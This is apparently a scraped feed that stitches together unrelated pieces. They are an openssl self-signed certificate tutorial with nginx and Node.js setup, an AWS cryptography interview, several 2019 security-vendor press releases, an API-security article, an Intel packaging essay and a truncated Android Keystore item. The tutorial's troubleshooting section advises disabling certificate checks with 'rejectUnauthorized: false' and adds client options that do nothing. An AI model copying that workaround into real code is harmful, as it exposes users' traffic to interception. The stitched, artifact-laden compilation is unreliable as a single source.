SSL is a protocol that makes the HTTP protocol secure by encrypting HTTP traffic. Secure HTTP is named HTTPS, which means HTTP traffic encrypted with SSL. SSL certificates use key-value pairs to define certificate properties. The Common Name is an important part of an SSL certificate because it is checked against the host and domain name.

Subject Alternative Name

The standard allows a single SSL certificate to carry only a single Common Name, meaning one certificate can cover only a single Host Name + Domain Name. The Subject Alternative Name (SAN) extension was created to remove this limitation. SAN defines multiple names, in effect multiple Common Names, in one SSL certificate, and it is shown as a separate attribute in the certificate.
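You can also list a certificate's SAN entries from the command line with openssl (the host is again only an example):

echo | openssl s_client -connect poftut.com:443 2>/dev/null | openssl x509 -noout -text | grep -A1 "Subject Alternative Name"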


Here is an example Subject Alternative Name, or SAN:

Subject Alternative Name

Check Common Name In Firefox

Click the lock icon, which can be yellow or red.



Then click Secure Connection.


Secure Connection

Click More Information


Click More Information

Click View Certificate


Click View Certificate

Then we can see the Common Name line, like below.


Common Name

Creating a Self-Signed SSL Certificate for HTTPS Access to a Development or Test Site

1 What Is a Digital Certificate?

A digital certificate is an identity mechanism for computers. A certificate authority (CA) signs (stamps) a signing-request file that was created with a private key, signifying that the CA endorses the certificate holder. Digital certificates have the following advantages:

Using a digital certificate raises the user's credibility
The public key in the certificate pairs with the server's private key, enabling encryption and decryption of data in transit
While the user's identity is being verified, the user's sensitive personal data is never transmitted to the certificate holder's network systems

An X.509 certificate setup involves three files: key, csr, and crt.

key: the private key
csr: the certificate signing request
crt: the certificate signed by the CA

In cryptography, X.509 is a standard that specifies public key certificates, certificate revocation lists, authorization credentials, and certification-path validation algorithms, among other things.

A browser has two ways to check whether a certificate is still valid: OCSP (Online Certificate Status Protocol) and CRL (Certificate Revocation List).
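As a rough sketch of checking revocation by hand with openssl (the responder URL below is a placeholder; use whatever -ocsp_uri prints for your certificate):

# find the OCSP responder URL embedded in a certificate
openssl x509 -noout -ocsp_uri -in server.crt

# ask that responder whether the certificate has been revoked
openssl ocsp -issuer ca.crt -cert server.crt -url http://ocsp.example-ca.com -resp_text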

2 Creating a Self-Signed Certificate

A digital certificate for production must be issued by a trusted third-party CA. During application development, we can generate self-signed certificates for the development or test environment.

2.1 Generating the Private Key and Self-Signed Certificate Step by Step

2.1.1 Generate the server private key

openssl genrsa -des3 -out server.key 4096

2.1.2 Generate the certificate signing request

openssl req -new -key server.key -out server.csr

You will be asked to fill in a pile of fields here; note that Common Name should be the domain name you intend to use for the site.

2.1.3 Sign the certificate signing request generated in the previous step

openssl x509 -req -days 3650 -in server.csr -signkey server.key -out server.crt

2.1.4 Generate a server private key with no password

If the private key has a password, the web server will ask you for it on every start.

openssl rsa -in server.key -out server.key.insecure
mv server.key server.key.secure
mv server.key.insecure server.key

Restrict read permissions on the key files to keep your private key safe, because this certificate cannot be revoked.

chmod 600 server.key.secure server.key

2.2 Creating the Private Key and Self-Signed Certificate in One Step

There is a simpler way to create the private key and the self-signed certificate in a single step:

openssl req -x509 -nodes -days 3650 -newkey rsa:2048 -keyout server.key -out server.crt

Sample input:

writing new private key to 'server.key'
-----
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
-----
Country Name (2 letter code) [AU]:CN
State or Province Name (full name) [Some-State]:GD
Locality Name (eg, city) []:GZ
Organization Name (eg, company) [Internet Widgits Pty Ltd]:lzwme
Organizational Unit Name (eg, section) []:blog
Common Name (e.g. server FQDN or YOUR name) []:*.lzw.me
Email Address []:webmaster@lzw.me

In all of the operations above, server.key is the private key and server.crt is the certificate.

3 Creating a Private CA Certificate and Certificates Signed by It

3.1 Generate the CA private key (ca.key) and CA certificate (ca.crt)

A CA certificate is just a self-signed certificate, except that the Common Name can be filled in freely.

openssl genrsa -out ca.key 2048
openssl req -new -x509 -days 3650 -key ca.key -out ca.crt

# or generate both in one step
openssl req -x509 -nodes -days 3650 -newkey rsa:2048 -keyout ca.key -out ca.crt

3.2 Generate the server private key (server.key) and certificate signing request (server.csr)

openssl genrsa -out server.key 2048
openssl req -new -key server.key -out server.csr

Note that the Common Name here should be identical to the domain name or IP you intend to use.

3.3 Sign the server certificate with the CA private key and certificate

openssl x509 -req -days 3650 -in server.csr -CA ca.crt -CAkey ca.key -set_serial 01 -out server.crt

4 Configuring the Web Server to Use the Self-Signed Certificate

The nginx configuration is the same as for any ordinary HTTPS site; the key directives are:

server {
    listen 443 ssl;
    ssl on;
    ssl_certificate     /path/to/server.crt;
    ssl_certificate_key /path/to/server.key;
    server_name         test.lzw.me;
}

For a self-hosted Node.js server:

const https = require('https');
const fs = require('fs');
const path = require('path');

const server = https.createServer({
  key: fs.readFileSync(path.join(__dirname, './ssl/server.key'), 'utf8'),
  cert: fs.readFileSync(path.join(__dirname, './ssl/server.crt'), 'utf8'),
  // the ca option should point at the CA certificate, not the CA private key
  ca: [fs.readFileSync(path.join(__dirname, './ssl/ca.crt'), 'utf8')],
}, app); // app is your request handler, e.g. an Express app

5 Adding the CA Certificate as a Trusted Root Certification Authority on the Client

On each client machine, the ca.crt certificate needs to be added as a trusted authority. The steps are roughly as follows:

Double-click ca.crt -> Install Certificate -> Local Machine -> choose "Place all certificates in the following store" -> Browse -> Trusted Root Certification Authorities -> OK.
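The same step can be scripted; a sketch, assuming an elevated Windows prompt or a Debian/Ubuntu client (the file name under ca-certificates is arbitrary):

# Windows (run as administrator)
certutil -addstore -f ROOT ca.crt

# Debian/Ubuntu
sudo cp ca.crt /usr/local/share/ca-certificates/my-dev-ca.crt
sudo update-ca-certificates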

6 Related Questions

6.1 How to view the information in various certificates

Here are some common ways to view certificate-related information.

openssl rsa -noout -text -in server.key              # view private key details
openssl req -noout -text -in server.csr              # view signing request details
openssl rsa -noout -text -in ca.key                  # view the CA private key details
openssl x509 -noout -text -in ca.crt                 # view certificate details
openssl crl -text -in xx.crl                         # view a certificate revocation list
openssl x509 -purpose -in cacert.pem                 # view a certificate's extra information
openssl rsa -in key.pem -pubout -out pubkey.pem      # extract the public key from a private key
openssl rsa -noout -text -pubin -in apache.pub       # view a public key's details
openssl verify -CAfile <path-to-CA-file> apache.crt  # verify that a certificate was issued by a given CA
openssl s_client -connect 192.168.20.51:443          # act as an SSL client against an SSL server;
    # if the server requests a client certificate, add -cert and -key, e.g.
    # openssl s_client -connect 192.168.20.51:443 -cert client.crt -key client.key
openssl pkcs12 -in path.p12 -out newfile.crt.pem -clcerts -nokeys  # extract the certificate from a p12 file
openssl pkcs12 -in path.p12 -out newfile.key.pem -nocerts -nodes   # extract the private key from a p12 file

6.2 Proxy software or in-app requests to the HTTPS service fail with Error: self signed certificate

If the CA certificate has been correctly added as a trusted root certification authority, everything should generally just work. If an application still reports this error, try disabling SSL verification. Taking http.request in Node.js as an example:

const https = require('https');

const options = {
  host: 'test.lzw.me',
  port: 8000,
  path: '/api/test',
  // Add these next lines
  rejectUnauthorized: false,
  requestCert: true,
  agent: false,
  secure: false,
};

https.request(options, function (res) {
  res.pipe(process.stdout);
}).end();

Related references:

https://blog.csdn.net/sdcxyz/article/details/47220129
https://blog.csdn.net/h330531987/article/details/74991694

AWS Security Profile (and re:Invent 2018 wrap-up): Eric Docktor, VP of AWS Cryptography



We sat down with Eric Docktor to learn more about his 19-year career at Amazon, what’s new with cryptography, and to get his take on this year’s re:Invent conference. (Need a re:Invent recap? Check out this post by AWS CISO Steve Schmidt.)

How long have you been at AWS, and what do you do in your current role?

I’ve been at Amazon for over nineteen years, but I joined AWS in April 2015. I’m the VP of AWS Cryptography, and I lead a set of teams that develops services related to encryption and cryptography. We own three services and a tool kit: AWS Key Management Service (AWS KMS), AWS CloudHSM , AWS Certificate Manager , plus the AWS Encryption SDK that we produce for our customers.

Our mission is to help people get encryption right. Encryption algorithms themselves are open source, and generally pretty well understood. But just implementing encryption isn’t enough to meet security standards. For instance, it’s great to encrypt data before you write it to disk, but where are you going to store the encryption key? In the real world, developers join and leave teams all the time, and new applications will need access to your data―so how do you make a key available to those who really need it, without worrying about someone walking away with it?

We build tools that help our customers navigate this process, whether we’re helping them secure the encryption keys that they use in the algorithms or the certificates that they use in asymmetric cryptography.

What did AWS Cryptography launch at re:Invent?

We’re really excited about the launch of KMS custom key store . We’ve received very positive feedback about how KMS makes it easy for people to control access to encryption keys. KMS lets you set up IAM policies that give developers or applications the ability to use a key to encrypt or decrypt, and you can also write policies which specify that a particular application―like an Amazon EMR job running in a given account―is allowed to use the encryption key to decrypt data. This makes it really easy to encrypt data without worrying about writing massive decrypt jobs if you want to perform analytics later.

But, some customers have told us that for regulatory or compliance reasons, they need encryption keys stored in single-tenant hardware security modules (HSMs) that they manage. This is where the new KMS custom key store feature comes in. Custom key store combines the ease of using KMS with the ability to run your own CloudHSM cluster to store your keys. You can create a CloudHSM cluster and link it to KMS. After setting that up, any time you want to generate a new master key, you can choose to have it generated and stored in your CloudHSM cluster instead of using a KMS multi-tenant HSM. The keys are stored in an HSM under your control, and they never leave that HSM. You can reference the key by its Amazon Resource Name (ARN), which allows it to be shared with users and applications, but KMS will handle the integration with your CloudHSM cluster so that all crypto operations stay in your single-tenant HSM.
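As a rough sketch of that flow with the AWS CLI (the key store name, cluster ID, certificate path, password, and IDs below are placeholders):

# register an existing CloudHSM cluster with KMS as a custom key store
aws kms create-custom-key-store \
    --custom-key-store-name ExampleKeyStore \
    --cloud-hsm-cluster-id cluster-1a23b4cdefg \
    --trust-anchor-certificate file://customerCA.crt \
    --key-store-password kmsPswd

# connect it, then create a master key whose material lives in your own HSMs
aws kms connect-custom-key-store --custom-key-store-id cks-1234567890abcdef0
aws kms create-key --origin AWS_CLOUDHSM --custom-key-store-id cks-1234567890abcdef0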

You can read our blog post about custom key store for more details.

If both AWS KMS and AWS CloudHSM allow customers to store encryption keys, what’s the difference between the services?

Well, at a high level, sure, both services offer customers a high level of security when it comes to storing encryption keys in FIPS 140-2 validated hardware security modules . But there are some important differences, so we offer both services to allow customers to select the right tool for their workloads.

AWS KMS is a multi-tenant, managed service that allows you to use and manage encryption keys. It is integrated with over 50 AWS services, so you can use familiar APIs and IAM policies to manage your encryption keys, and you can allow them to be used in applications and by members of your organization. AWS CloudHSM provides a dedicated, FIPS 140-2 Level 3 HSM under your exclusive control, directly in your Amazon Virtual Private Cloud (VPC). You control the HSM, but it’s up to you to build the availability and durability you get out of the box with KMS. You also have to manage permissions for users and applications.

Other than helping customers store encryption keys, what else does the AWS Cryptography team do?

You can use CloudHSM for all sorts of cryptographic operations, not just key management. But we definitely do more than KMS and CloudHSM!

AWS Certificate Manager (ACM) is another offering from the cryptography team that’s popular with customers, who use it to generate and renew TLS certificates. Once you’ve got your certificate and you’ve told us where you want it deployed, we take care of renewing it and binding the new certificate for you. Earlier this year, we extended ACM to support private certificates as well, with the launch of ACM Private Certificate Authority .

We also helped the AWS IoT team launch support for cryptographically signing software updates sent to IoT devices . For IoT devices, and for software installation in general, it’s a best practice to only accept software updates from known publishers, and to validate that the new software has been correctly signed by the publisher before installing. We think all IoT devices should require software updates to be signed, so we’ve made this really easy for AWS IoT customers to implement.

What’s the most challenging part of your job?

We’ve built a suite of tools to help customers manage encryption, and we’re thrilled to see so many customers using services like AWS KMS to secure their data. But when I sit down with customers, especially large customers looking seriously at moving from on-premises systems to AWS, I often learn that they have years and years of investment into their on-prem security systems. Migrating to the cloud isn’t easy. It forces them to think differently about their security models. Helping customers think this through and map a strategy can be challenging, but it leads to innovation―for our customers, and for us. For instance, the idea for KMS custom key store actually came out of a conversation with a customer!

What’s your favorite part of your job?

Ironically, I think it’s the same thing! Working with customers on how they can securely migrate and manage their data in AWS can be challenging, but it’s really rewarding once the customer starts building momentum. One of my favorite moments of my AWS career was when Goldman Sachs went on stage at re:Invent last year and talked about how they use KMS to secure their data.

Five years from now, what changes do you think we’ll see within the field of encryption?

The cryptography community is in the early stages of developing a new cryptographic algorithm that will underpin encryption for data moving across the internet. The current standard is RSA, and it’s widely used. That little padlock you see in your web browser telling you that your connection is secure uses the RSA algorithm to set up an encrypted connection between the website and your browser. But, like all good things, RSA’s time may be coming to an end―the quantum computer could be its undoing. It’s not yet certain that quantum computers will ever achieve the scale and performance necessary for practical applications, but if one did, it could be used to attack the RSA algorithm. So cryptographers are preparing for this. Last year, the National Institute of Standards and Technology (NIST) put out a call for algorithms that might be able to replace RSA, and got 68 responses. NIST is working through those ideas now and will likely select a smaller number of algorithms for further study. AWS participated in two of those submissions and we’re keeping a close eye on NIST’s process. New cryptographic algorithms take years of testing and vetting before they make it into any standards, but we want to be ready, and we want to be on the forefront. Internally, we’re already considering what it would look like to make this change. We believe it’s our job to look around corners and prepare for changes like this, so our customers don’t have to.

What’s the most common misconception you encounter about encryption?

Encryption technology itself is decades-old and fairly well understood. That’s both the beauty and the curse of encryption standards: By the time anything becomes a standard, there are years and years of research and proof points into the stability and the security of the algorithm. But just because you have a really good encryption algorithm that takes an encryption key and a piece of data you want to secure and spits out an impenetrable cipher text, it doesn’t mean that you’re done. What did you do with the encryption key? Did you check it into source code? Did you write it on a piece of paper and leave it in the conference room? It’s these practices around the encryption that can be difficult to navigate.

Security-conscious customers know they need to encrypt sensitive data before writing it to disk. But, if you want your application to run smoothly, sometimes you need that data in clear text. Maybe you need the data in a cache. But who has access to the cache? And what logging might have accidentally leaked that information while the application was running and interacting with the cache?

Or take TLS certificates. Each TLS certificate has a public piece―the certificate―and a private piece―a private key. If an adversary got ahold of the private key, they could use it to impersonate your website or your API. So, how do you secure that key after you’ve procured the certificate?

It’s practices like this that some customers still struggle with. You have to think about all the places that your sensitive data is moving, and about real-world realities, like the fact that the data has to be unencrypted somewhere. That’s where AWS can help with the tooling.

Which re:Invent session videos would you recommend for someone interested in learning more about encryption?

Ken Beer’s encryption talk is a very popular session that I recommend to people year after year. If you want to learn more about KMS custom key store, you should also check out the video from the LaunchPad event , where we talked with Box about how they’re using custom key store.

People do a lot of networking during re:Invent. Any tips for maintaining those connections after everyone’s gone home?

Some of the people that I meet at re:Invent I get to see again every year. With these customers, I tend to stay in touch through email, and through Executive Briefing Center sessions. That contact is important since it lets us bounce ideas off each other and we use that feedback to refine AWS offerings. One conference I went to also created a Slack channel for attendees―and all the attendees are still on it. It’s quiet most of the time, but people have a way to re-engage with each other and ask a question, and it’ll be just like we’re all together again.

If you had to pick any other job, what would you want to do with your life?

If I could do anything, I’d be a backcountry ski guide. Now, I’m not a good enough skier to actually have this job! But I like being outside, in the mountains. If there was a way to make a living out of that, I would!

Dragos Selected as SC Media 2019 SCADA Security Award Finalist

Dragos’ industrial cybersecurity platform provides comprehensive asset identification, threat detection, and response

HANOVER, Md. (BUSINESS WIRE) #Cybersecurity Dragos, Inc., provider of the industry’s most trusted industrial cybersecurity platform and services, has been recognized as a finalist in the 2019 SC Media Awards program for best supervisory control and data acquisition (SCADA) security solution.


The Dragos platform provides industrial asset identification and threat visibility to strengthen security teams’ threat detection, mitigation, and response capabilities. It is an automated network-monitoring appliance that passively identifies ICS assets and communications, alerts to malicious activity, and guides defenders step-by-step if a threat is found. Dragos’ team of expert practitioners’ knowledge and deep experience are codified and transferred to its customers, so they are empowered to establish resilient industrial control systems (ICS) security postures while learning from the Dragos team every step of the way.

“We are honored to be selected as a finalist in the SC Media Awards program. The Dragos platform was built from our experience as ICS security practitioners to meet the real-world needs of ICS defenders,” says Robert M Lee, CEO and co-founder of Dragos. “There is a shortage of skilled personnel in industrial cybersecurity, and we appreciate being recognized for our ability to help as the best SCADA security solution. Every improvement we make towards protecting and strengthening our infrastructure means reduced downtime, reduced dwell time, and increased safety worldwide.”

SC Awards is recognized as the industry standard of accomplishment for cybersecurity professionals, products, and services. All finalists were chosen by an expert panel of judges with extensive knowledge and experience in the cybersecurity industry. To learn more about the 2019 SC Awards, visit https://www.scmagazine.com/2019-sc-awards-finalists/ . Winners will be announced at the SC Awards ceremony on March 5, 2019, in San Francisco.

About Dragos

Dragos’ industrial cybersecurity platform delivers unprecedented visibility and prescriptive procedures to respond to adversaries in the industrial threat landscape. Dragos codifies intelligence and threat behavior analytics for effective ICS threat detection and response. Dragos also offers ICS threat hunting and incident response services, as well as Dragos ICS WorldView for weekly ICS threat intelligence reports. Learn more at www.dragos.com , or follow us on Twitter or LinkedIn .

Contacts

Kari Walker for Dragos
703-928-9996
kari@zagcommunications.com

Agari Recognized as 2019 SC Magazine Awards “Best Email Security Solution” Finalist

Next-Generation Secure Email Cloud Selected for Ability to Detect, Defend against and Deter Advanced Email Attacks

FOSTER CITY, Calif. (BUSINESS WIRE) Agari , the next-generation Secure Email Cloud that restores trust to the inbox, today announced that SC Magazine has named Agari as “Best Email Security Solution” Finalist for the 2019 SC Magazine Awards. In April 2018, Agari won the 2018 SC Magazine Award for “Best Email Security Solution.”

“Nobody understands the cybersecurity battle better than the cybersecurity professionals who work day in and day out to clean up and protect businesses from malicious attacks,” added Armstrong of SC Media. “Agari is one of a select few to receive this tremendous recognition of a Trust Award finalist, and they should be proud of the work this represents.”

“Agari is proud to be recognized by SC Magazine in two consecutive years for its ability to provide the best email security solution on the market,” said Armen Najarian, CMO, Agari. “The Agari Secure Email Cloud defines the next-generation of email authentication controls, and our strategy has been validated by our customers, our partners, and―once again―by the SC Magazine Awards.”

The 2019 SC Magazine Awards “Best Email Security Solution” nominations were evaluated on their ability to exchange email with assurance, limit the repercussions of email forgery and to filter unauthorized content, such as phishing.

The Agari Secure Email Cloud is a next-generation solution that uses predictive AI to detect, defend against and deter advanced email attacks including Business Email Compromise (BEC), spearphishing, and account-takeover based attacks. Agari eliminates unauthenticated email, implements protection against advanced email threats, and automates incident response to protect business from breaches, fraud, and theft. The Agari Secure Email Cloud also includes some capabilities found in legacy SEGs, including URL analysis and attachment analysis.

Now in its 22nd year, SC Awards is recognized as the industry gold standard of accomplishment for cybersecurity professionals, products and services. With the awards, SC Media recognizes the achievements of cybersecurity professionals in the field, the innovations happening in the vendor and service provider communities, and the vigilant work of government, commercial and nonprofit entities. Vendors and service providers who offer a product and/or service for the commercial, government, educational, nonprofit or other industries are eligible for the SC Awards’ Trust Award category.

“Every new year brings with it an unpredictable mix of adversity and opportunity for information security professionals,” said Illena Armstrong, VP, editorial, SC Media. “In 2018, we watched as ransomware took down entire city governments, popular online platforms were accused of mishandling user data, and technology giants announced an unprecedented industry-wide effort to solve the Spectre and Meltdown CPU vulnerabilities. Through it all, this year’s SC Awards finalists found ways to break boundaries, overcome challenges and contribute fresh new ideas to the world of cybersecurity.”

About Agari

Agari is transforming the legacy Secure Email Gateway with its next-generation Secure Email Cloud powered by predictive AI. Leveraging data science and real-time intelligence from trillions of emails, the Agari Identity Graph detects, defends, and deters costly advanced email attacks including business email compromise, spear phishing and account takeover. Winner of the 2018 Best Email Security Solution by SC Magazine, Agari restores trust to the inbox for government agencies, businesses, and consumers worldwide. Learn more at www.agari.com .

About SC Media

SC Media is cybersecurity. For 30 years, they have armed information security professionals with in-depth and unbiased information through timely news, comprehensive analysis, cutting-edge features, contributions from thought leaders, and independent product reviews in partnership with and for top-level information security executives and their technical teams. In addition to their comprehensive website, SC Media offers magazines, eBooks, and newsletters. They also host digital and live events such as SC Awards and RiskSec NY to provide cybersecurity professionals all the information needed to safeguard their organizations and contribute to their longevity and success.

Friend us on Facebook: http://www.facebook.com/SCMag
Follow us on Twitter: http://twitter.com/scmagazine

Contacts

Clinton Karr
agari@summitstrategygroup.net
(415) 993-1010



Cylance Narrows the Cybersecurity Skills Gap with Virtual CISO

CISO-in-a-Box Offering Helps Security Executives Meet Industry Standards, Deploy Proven Frameworks, and Adhere to Compliance Regulations

IRVINE, Calif. (BUSINESS WIRE)

Cylance , the leading provider of AI-driven, prevention-first security solutions, today announced the availability of its virtual chief information security officer (vCISO) service, a program designed to provide organizations with critical technology and security resources that support next-generation security architectures and offer robust staff augmentation.



Cylance vCISO enables customers at organizations large and small to tackle the cybersecurity skills shortage that has long been a problem for CISOs. In fact, a recent study notes that the skills gap―up by more than 50% in the last three years―is expected to grow to more than two million unfilled positions by 2019, while the cost of cyber crime is projected to reach $6 trillion in 2021. Seasoned security experts from Cylance provide organizations the expertise to detect and prevent cyber attacks without compromising their ability to deliver on core business objectives.

“Today’s cybersecurity landscape presents CISOs the challenge of trying to implement digital transformation and other important initiatives across their organizations without the adequate people or systems in place to support the complex environments they manage,” said Corey White, senior vice president of Cylance Consulting. “To meet those challenges, security leaders require access to expert knowledge on the fly that helps them identify, assess, and communicate security risks to their management teams and boards of directors, which in turn helps them better manage risk and keep the overall costs of security compliance under control.”

Cylance vCISO taps a broad set of techniques including automation and artifact analysis to collect information and assess data. It also defines likely security scenarios to build risk profiles, recommend actions, and highlight internal strengths, allowing organizations to customize their approach to prevention-first security without having to customize all of the technology that supports their security environments.

Cylance vCISO helps organizations manage day-to-day security needs and meet common security standards, frameworks, and compliance regulations such as NIST, ISO/IEC, SANS CIS, and more by assigning experienced security professionals with discrete expertise in the areas customers most want to invest in. Personnel work from remote locations or at a customer’s physical address, depending on the needs and urgency of the project.

To schedule a consultation with a Cylance vCISO please contact: proservices@cylance.com .

About Cylance Inc.

Cylance develops artificial intelligence to deliver prevention-first, predictive security products and smart, simple, secure solutions that change how organizations approach endpoint security. Cylance provides full spectrum predictive threat prevention and visibility across the enterprise to combat the most notorious and advanced cybersecurity attacks. With AI-based malware prevention, threat hunting, automated detection and response, and expert security services, Cylance protects the endpoint without increasing staff workload or costs. We call it the Science of Safe. Learn more at www.cylance.com

Contacts

KC Higgins
Cylance Media Relations
+1 303.434.8163
khiggins@cylance.com

It’s past time to pay much more attention to API security


Organizations manage 363 APIs, on average. But vulnerable APIs can expose your data to anyone who knows how to ask for it. API security starts with the basics.



The original version of this post was published in Forbes .

It’s obvious that just about every entity with an online presence thinks APIs (application programming interfaces) are pretty cool―and necessary.

A survey by One Poll found that organizations manage an average of 363 different APIs, with 69% of organizations making those APIs accessible not just to their partners but to the public as well.

For good reason. As a description in TechCrunch put it, APIs provide “critical connective tissue and increasingly important functionality” among software components. That includes rules about how different parts of online applications such as databases and webpages should interact with one another.

Unfortunately, cyber criminals think they’re pretty cool too, because misconfigured or otherwise vulnerable APIs can amount to the digital version of unlocked doors or broken windows, making just about every “room” in the house accessible.

Again TechCrunch: “APIs are an attractive target for threat actors because they act as the glue linking different services―they allow data to flow freely from one area to the next, and thus provide a rich vein of information if they are compromised.”


API attacks on the rise

Jesse Victors, security consultant at Synopsys, said he has seen multiple instances where “an API allows users to log in and authenticate themselves, but doesn’t perform any authorization checks beyond that point. As a result, someone can retrieve information belonging to another user―a privilege escalation.”

That is not a technical problem with the API itself, he said, “but rather an implementation failure to secure it against common and well-known types of attacks.”

There are an alarming number of recent examples.

Just a few weeks ago, security blogger Brian Krebs reported that the U.S. Postal Service had allowed an API weakness that exposed account details for about 60 million users to go unpatched for more than a year after it had been notified about it by a security researcher. The researcher, who wanted to remain anonymous, got so frustrated he eventually contacted Krebs.

Krebs verified the vulnerability, which he said “let any logged-in usps.com user query the system for account details belonging to any other users, such as email address, username, user ID, account number, street address, phone number, authorized users, mailing campaign data and other information.”

Once Krebs contacted the USPS, the agency fixed the problem, saying in an emailed statement to Threatpost that “the information shared with the Postal Service allowed us to quickly mitigate this vulnerability.”

Quickly―after more than a year of ignoring it.



Unfortunately, the USPS is not alone. The list of high-profile companies that exposed information on customers due to API problems in just the last few months includes online retail giant Amazon , telecom T-Mobile , food retailer Panera Bread , and the Black Hat security conference , where an attendee hacked his own badge and demonstrated that he could access the data of everybody else who had attended, thanks to a “legacy” (i.e., leaky) API used by the BCard maker, ITN International.

RELATED: These hacks brought to you by ‘leaky’ APIs

Are APIs inherently insecure?

Does this make APIs the new “weakest link in the security chain”?

Not necessarily. Part of the problem is that there are more―a lot more―of them to secure. “As technologies shift to single-purpose microservices, we are seeing more and more APIs to facilitate that communication, and thus there are more APIs and implementations to configure and secure,” Victors said.

Andrew van der Stock, senior principal consultant at Synopsys, added, “The attack surface is greater simply because of the greater demand for B2B connectivity. The information was always there, but difficult to get at. APIs make the friction of doing business much less, so we expect to see explosive growth of APIs―the business need is just too great to stopper this genie.”



And Chris Schmidt, senior staff research engineer at Synopsys, said APIs are no weaker than any other component of application development, but have become a more popular target because many were designed to support functionality internally and were therefore protected by “upstream” security controls. But when they are exposed publicly, “those controls are no longer present.”

Also, based on recent events, they are probably among the most ignored of security chain links. Nicholas Weaver, researcher at the International Computer Science Institute and lecturer at the University of California, Berkeley, told Krebs that implementing access controls is “not even Information Security 101, this is Information Security 1,” and that the failure of the USPS and others to do so was “catastrophically bad.”

Indeed, multiple experts have noted that APIs should enforce both authentication (Who are you?) and authorization (Should you have access to this?) for every request.

Which means that buried in all this bad news is good news: This is a problem that can be fixed, by deploying APIs correctly and with better security testing. Doing the basics, in other words.
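To make “the basics” concrete, here is a minimal sketch of an API that answers both questions on every request. This is our own illustration, not code from any company mentioned above: the Flask framework, the token table, and the ownership check are all hypothetical stand-ins.

from flask import Flask, request, abort, jsonify

app = Flask(__name__)

TOKENS = {"secret-token-1": "alice"}        # hypothetical token -> user map
ACCOUNTS = {"42": "alice", "43": "bob"}     # hypothetical account -> owner map

def current_user():
    # Authentication: who are you?
    token = request.headers.get("Authorization", "").replace("Bearer ", "")
    user = TOKENS.get(token)
    if user is None:
        abort(401)  # unauthenticated requests get nothing
    return user

@app.route("/accounts/<account_id>")
def get_account(account_id):
    user = current_user()
    # Authorization: should *you* see *this* record? Skipping this second
    # check is exactly the privilege escalation Victors describes.
    if ACCOUNTS.get(account_id) != user:
        abort(403)
    return jsonify({"account": account_id, "owner": user})

The point is the second check: authenticating the caller and then serving whatever account they name is precisely the USPS-style failure described above.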

How to prevent insecure APIs

Van der Stock said the security industry needs to “shift left”―start security testing early and continue throughout the development process.



“They need to adopt the same tooling as developers and write the sort of tests that fully exercise APIs, particularly those that have the potential to extract bulk personal information,” he said.

Victors added that engineers building an API, a protocol, or any other structure should “take the time to consider how their application handles unusual requests.” A good place to start would be the 2017 OWASP Top 10 , which lists and describes the most common application risks, based on a broad industry analysis.

Security, Scaling and Power

$
0
0

If anyone has doubts about the slowdown and increasing irrelevance of Moore’s Law, Intel’s official unveiling of its advanced packaging strategy should leave little doubt. Inertia has ended and the roadmap is being rewritten.

Intel’s discussion of advanced packaging is nothing new. The company has been public about its intentions for years, and started dropping hints back when Pat Gelsinger was general manager of Intel’s Digital Enterprise Group. (Gelsinger left Intel in 2009.) Others inside of Intel have discussed packaging plans and advancements since then. The company’s purchase of NoC vendor NetSpeed Systems in September was the glue to make all of these pieces work together.

Intel has been collecting and developing those puzzle pieces for years. The purchase of Altera in 2015 allowed it to add programmability into designs. It also rolled out a die-to-die bridge (Embedded Multi-die Interconnect Bridge, aka EMIB) in 2016. And it has made investments in new memory types such as SSDs (Optane) and phase-change memory (3D XPoint), which potentially could replace L3 cache. All of these moves show just how serious and methodical Intel has been about this whole effort. And while the company has made some very high profile mistakes over the years, such as missing the entire mobile market trend, it has been remarkably consistent about how to continue reaping performance and power benefits from processors.

But all of this is being accelerated now for a couple of main reasons. One involves the power/performance impact of security threats. Speculative execution and branch prediction, two very effective ways of speeding up processors, create security vulnerabilities in hardware. Closing up those vulnerabilities causes a performance hit.

Intel isn’t alone in this. All of the established processor and processor IP companies have been scrambling to close up these security holes. Yet Intel was particularly hard hit because its largest customers―data centers―run their businesses based on performance per watt. A 10% loss of performance translates into added costs, because data centers must add more servers to run the same workloads at the same speed. It also takes more energy to power up and cool those additional servers. And in places like New York, where there is a ceiling on electricity generation and commercial real estate prices are high, that’s not a pleasant discussion to have with your customers.

Second, the benefits of scaling are dwindling. Samsung says that improvements per node after 7nm will be in the range of 20%, and not all of that will come from scaling. While any improvement is still attractive, it may not be enough to warrant regular upgrades by customers. That needs to be supplemented by other improvements, and the most likely sources are architectural and packaging, which is just beginning to mature. Fan-outs, 2.5D and even 3D designs are in use today across a variety of high-volume and niche markets, and the benefits in terms of performance and lower power are proven. The remaining issues are cost and design time, and both of those are being addressed with more flexible platform types of approaches such as chiplets.

Coincidentally and serendipitously, AI is suddenly showing up everywhere, spurred by machine-generated algorithms and the economics of machines doing some things better than people. This is yet another driver of high-performance, low-power design, and it’s a brand new application for which there is no precedent.

What’s not clear yet is how chips will be architected to harness AI/ML/DL. While the basic physics of moving data around―or design changes to process more data without moving it―are well understood, the use cases for making this efficient are still evolving. It’s one thing to build a chip that can handle massive data throughput. It’s quite another to do it efficiently. A key problem there is generating enough data to keep all of the processing elements on that chip busy all the time or, alternatively, sizing the chip appropriately.

There are other stumbling blocks, as well. Some processors work better for certain algorithms and data types than others. But because this field is so new and the algorithms are in a state of almost constant change, it’s difficult to design a processor that will work optimally for any significant period of time. Some level of programmability needs to be added into the mix, and architectures need to be flexible enough to handle these changes.

Put all of these factors together and it brings Intel’s recent announcements into focus. Still, these changes reach well beyond just Intel. Intel is a bellwether. But the whole chip world is changing, and the impact on both power and performance across a wide range of applications will be significant and long-lasting.


Google Beefs Up Android Key Security for Mobile Apps



Changes to how data is encrypted can help developers ward off data leakage and exfiltration.

Google is making a few tweaks to its tools for Android mobile developers to boost the security of their wares, an apropos announcement against the backdrop of recent security issues stemming from poor development practices.

Cryptographic changes this week for Android Keystore give developers more ways to prevent inadvertent exposure of sensitive data to other applications or to the OS, and help keep data exfiltration at bay.

Keystore provides app developers with a set of hardware-rooted crypto-tools designed to secure user data with a key-based system. Developers can use the Keystore to define which application “secrets” are encrypted, and in what context they can be unlocked.

With the release of Android Pie, Google’s latest mobile OS, developers now have the ability to better protect sensitive information by preventing applications from decrypting keys if the user isn’t using the device.

